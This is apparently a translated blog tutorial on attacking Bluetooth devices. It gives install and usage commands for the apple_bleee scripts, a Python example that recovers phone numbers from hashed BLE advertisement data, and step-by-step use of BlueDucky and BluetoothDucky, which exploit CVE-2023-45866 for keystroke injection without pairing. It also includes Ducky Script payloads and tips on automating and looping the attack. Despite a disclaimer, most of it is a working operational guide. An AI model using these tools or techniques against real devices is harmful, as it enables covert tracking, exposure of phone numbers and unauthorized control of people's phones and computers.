Attacks on Bluetooth. Part 2. “Apple and blue duck”

Introduction

We are glad to welcome you again, dear reader! In this article we continue the topic of attacks on Bluetooth. In the previous article we looked at the lightweight, obvious kind of attack; there is nothing complicated about those.

In this article we have prepared something more interesting for you. Few people have written about these attacks (or so it seems to us; when we searched for similar material, we found very little or nothing at all).

Disclaimer: all data in this article is taken from open sources, does not call for any action and is provided only for information and for studying the mechanisms of the technologies involved.

Apple_bleee or jokes with apple

What is this?

These scripts demonstrate how an attacker who passively captures Bluetooth Low Energy (BLE) traffic can obtain sensitive information, such as unique identifiers of Apple devices. They illustrate potential weaknesses and are intended for education or for authorized security testing.

Installation

Installation requires a number of components.

Installing the scripts themselves

git clone https://github.com/hexway/apple_bleee.git
cd apple_bleee

Installing components and modules

sudo apt update && sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txt

Installing owl for the AWDL interface (owl is an open-source AWDL implementation; it is needed for the AirDrop script below)

git clone https://github.com/seemoo-lab/owl.git && cd ./owl && git submodule update --init && mkdir build && cd build && cmake .. && make && sudo make install && cd ../..

Or, on distributions that package it, simply

sudo apt install owl

Usage

First, make sure the Bluetooth adapter is up; list the available adapters with the command

hcitool dev

The ble_read_state.py script sniffs BLE advertisements and displays status information about nearby Apple devices. It also detects Wi-Fi password sharing requests from Apple devices. From these packets you can extract the first three bytes of SHA256(phone_number) and try to recover the original phone number using precomputed tables of hashes for candidate numbers. Three bytes is only 24 bits, so the lookup is practical for any block of numbers you can enumerate.

To start monitoring, we use this script using the following command:

sudo python3 ble_read_state.py

You can track a device's status: what kind of device it is, whether it is connected to Wi-Fi, and the type and version of its operating system.
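To make the two mechanisms above concrete, here is an added example (not code from apple_bleee or from the article's authors). It parses a BLE advertisement into its AD structures, pulls the Apple TLV messages out of the manufacturer-specific record, and then recovers a phone number from a 3-byte SHA-256 prefix with a precomputed table. The advertisement bytes are constructed for the demo, the message type 0x0F and the position of the hash inside its body are assumptions, and the hashed string (bare digits, country code first) is also an assumption; only the AD-structure and company-ID parsing follows the Bluetooth specification.

```python
import hashlib
from collections import defaultdict

APPLE_COMPANY_ID = 0x004C   # Bluetooth SIG company identifier assigned to Apple


def parse_ad_structures(adv):
    """Split raw BLE advertising data into (ad_type, payload) records.
    Each record is: length byte (counts type + payload), type byte, payload."""
    records = []
    i = 0
    while i < len(adv):
        length = adv[i]
        if length == 0:                 # zero length pads/terminates the data
            break
        if i + 1 + length > len(adv):
            raise ValueError("truncated AD structure")
        records.append((adv[i + 1], bytes(adv[i + 2:i + 1 + length])))
        i += 1 + length
    return records


def apple_messages(adv):
    """Extract Apple's (type, body) messages from manufacturer-specific data (AD type 0xFF).
    After the little-endian company ID, Apple packs one or more TLVs: type, length, body."""
    msgs = []
    for ad_type, payload in parse_ad_structures(adv):
        if ad_type != 0xFF or len(payload) < 2:
            continue
        if int.from_bytes(payload[:2], "little") != APPLE_COMPANY_ID:
            continue
        body, j = payload[2:], 0
        while j + 2 <= len(body):
            mtype, mlen = body[j], body[j + 1]
            msgs.append((mtype, bytes(body[j + 2:j + 2 + mlen])))
            j += 2 + mlen
    return msgs


def hash_prefix(identifier, nbytes=3):
    """First nbytes of SHA-256 over the identifier. Assumption for this example:
    the phone number is hashed as its bare digits (country code first, no '+')."""
    return hashlib.sha256(identifier.encode()).digest()[:nbytes]


def build_prefix_table(numbers, nbytes=3):
    """Precompute prefix -> [numbers] for a block of candidate numbers; this is the
    'pre-prepared table' the article refers to, built here for a small block."""
    table = defaultdict(list)
    for n in numbers:
        table[hash_prefix(n, nbytes)].append(n)
    return table


def candidates(table, prefix):
    """All numbers in the block whose SHA-256 starts with the observed bytes."""
    return list(table.get(prefix, []))


# Constructed sample: a 10,000-number block. 3 bytes give 2^24 prefix values, so
# collisions inside a block this size are rare and the number is usually unique.
NUMBER_BLOCK = [f"1555000{i:04d}" for i in range(10_000)]
TABLE = build_prefix_table(NUMBER_BLOCK)

# Constructed advertisement: Flags record, then Apple manufacturer data carrying one
# TLV of type 0x0F whose body ends with the 3-byte phone hash. The hash position is
# an assumption for this demo, not Apple's documented layout.
TARGET = "15550001234"
SAMPLE_BODY = bytes([0x08]) + hash_prefix(TARGET)
SAMPLE_MFR = APPLE_COMPANY_ID.to_bytes(2, "little") + bytes([0x0F, len(SAMPLE_BODY)]) + SAMPLE_BODY
SAMPLE_ADV = bytes([0x02, 0x01, 0x06]) + bytes([len(SAMPLE_MFR) + 1, 0xFF]) + SAMPLE_MFR


def recover_numbers(adv, table=TABLE):
    """Take the trailing 3 bytes of every type-0x0F message and look them up."""
    found = []
    for mtype, body in apple_messages(adv):
        if mtype == 0x0F and len(body) >= 3:
            found.extend(candidates(table, body[-3:]))
    return found


if __name__ == "__main__":
    print("Apple TLVs:", [(hex(t), b.hex()) for t, b in apple_messages(SAMPLE_ADV)])
    print("candidates:", recover_numbers(SAMPLE_ADV))
    print("prefix collisions in block:", sum(len(v) > 1 for v in TABLE.values()))
```

The same table lookup applies to the phone hash that airdrop_leak.py prints: the hash is useless on its own, but a table over every number block plausible for the target region turns it into a handful of candidates.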

Now the airdrop_leak.py script. It lets you obtain the phone number (strictly, its hash, which is then looked up in the same precomputed tables) of any user who tries to send a file via AirDrop. This is what the AWDL interface is for: put the Wi-Fi adapter into monitor mode and start owl.

Without parameters, the script simply displays the phone hash and the sender's IPv6 address.

The adv_wifi.py script sends BLE advertisements that request Wi-Fi password sharing. The demo shows that an attacker can make a pop-up appear on the target device if they know a phone number or email address associated with the victim's device.

sudo python3 adv_wifi.py -e pr@hexway.io -s hexway

The adv_airpods.py script imitates AirPods by broadcasting the corresponding BLE advertisements.

sudo python3 adv_airpods.py -r

With this set of scripts you can devise many things; it all depends on your imagination. You can also automate these scripts on a Raspberry Pi and build something more interesting.

BlueDucky or BluetoothDucky. Cheerful blue duck

What is this?

Now we move on to the most interesting tool of this article! But first, a little background.

The vulnerability CVE-2023-45866 can be exploited without specialized equipment: the attack is carried out from a Linux computer with a standard Bluetooth adapter. Engineer Marc Newlin discovered the issue and reported it to Apple, Google, Canonical and the Bluetooth SIG. The flaw lets an attacker within Bluetooth range of the victim's device emulate a keyboard and inject keystrokes without any confirmation from the user, and thereby perform malicious actions on devices that do not require a password or biometric authentication.

BlueDucky is a tool for exploiting this vulnerability. With it you can:

  • Load previously saved Bluetooth devices that are no longer discoverable but still have Bluetooth turned on.

  • Automatically save every device you scan.

  • Send payloads in Ducky Script format to interact with devices.

Installation

First you need to install all dependencies from apt.

sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

Then install pybluez.

git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

Install bdaddr from the bluez repository.

cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Finally, install and launch the tool itself.

git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
sudo python3 BlueDucky.py

Usage

Now for the demonstration. The tool ships with two ready-made payloads: the first opens a website, the second types a string and then presses GUI+s.

File payload_example_1.txt:

REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

File payload_example_2.txt:

REM This is a comment and will not run
STRING lifehackLL
DELAY 200
GUI s

The scripts may not work entirely correctly on smartphones because they were originally written for PCs; the second one, however, works well on smartphones. The target does not need to be paired beforehand: the tool initiates pairing itself, and the vulnerability means no confirmation is requested from the user. In our observation, though, the attack succeeds only about one time in three, so plan for failures and have a fallback if the payload does not run. Still, the ability to attack without prior pairing opens up new possibilities for security testing and vulnerability detection on mobile devices.

To start, run sudo python3 BlueDucky.py (root is needed for raw HCI access). By default the tool uses the hci0 adapter; to use another one, for example hci1, pass the flag --adapter hci1.

Before that, you need the target's MAC address; obtain it with the command hcitool scan. Note that a classic inquiry only lists devices that are currently discoverable, which is why the tool also keeps a list of previously scanned devices.

Next, run the script, enter the MAC address of the device of interest and choose a payload; we pick the second one.

Now watch the result: suppose we were chatting with someone on Telegram; then the tool connected to us, entered some text (even without the on-screen keyboard appearing), and later the Messages application opened.

There is an alternative script, BluetoothDucky, which we find more interesting. Its main advantage is that it can be automated: installation is identical to the previous one, but it is invoked by its full name, BluetoothDucky, and takes its settings as command-line parameters, so it can be driven from other scripts and configured for various tasks.

git clone https://github.com/pentestfunctions/BluetoothDucky
cd BluetoothDucky

This version also has a scan mode; it is buggy, but it works.

This version ships with its own payload, which is short and simple.

REM open a text field on the android device to test if it is working
DELAY 1000
STRING robot was here
DELAY 1000
Enter
DELAY 1000

Again, you can freely edit this file and write your own actions.

It is launched as follows, and the syntax is quite clear:

sudo python3 BluetoothDucky.py -i hci0 -t 00:00:00:00:00:00

Another nice feature: where the previous version (in this article) essentially ran the payload only once, this version runs it almost in a loop, re-sending it repeatedly.

As you may have guessed, we prefer the second script: it is more practical, more autonomous and, as noted, can be automated, and automating an attack like this is particularly interesting.

Conclusion

In this article we drew attention to lesser-known Bluetooth attacks that attackers can use widely. One example is CVE-2023-45866, which lets an attacker inject keystrokes into a device over Bluetooth without specialized equipment; an ordinary computer with a Bluetooth adapter is enough. It is therefore important to pay attention to the security of Bluetooth connections, especially if your phone is constantly connected to headphones or speakers and so always has Bluetooth enabled.
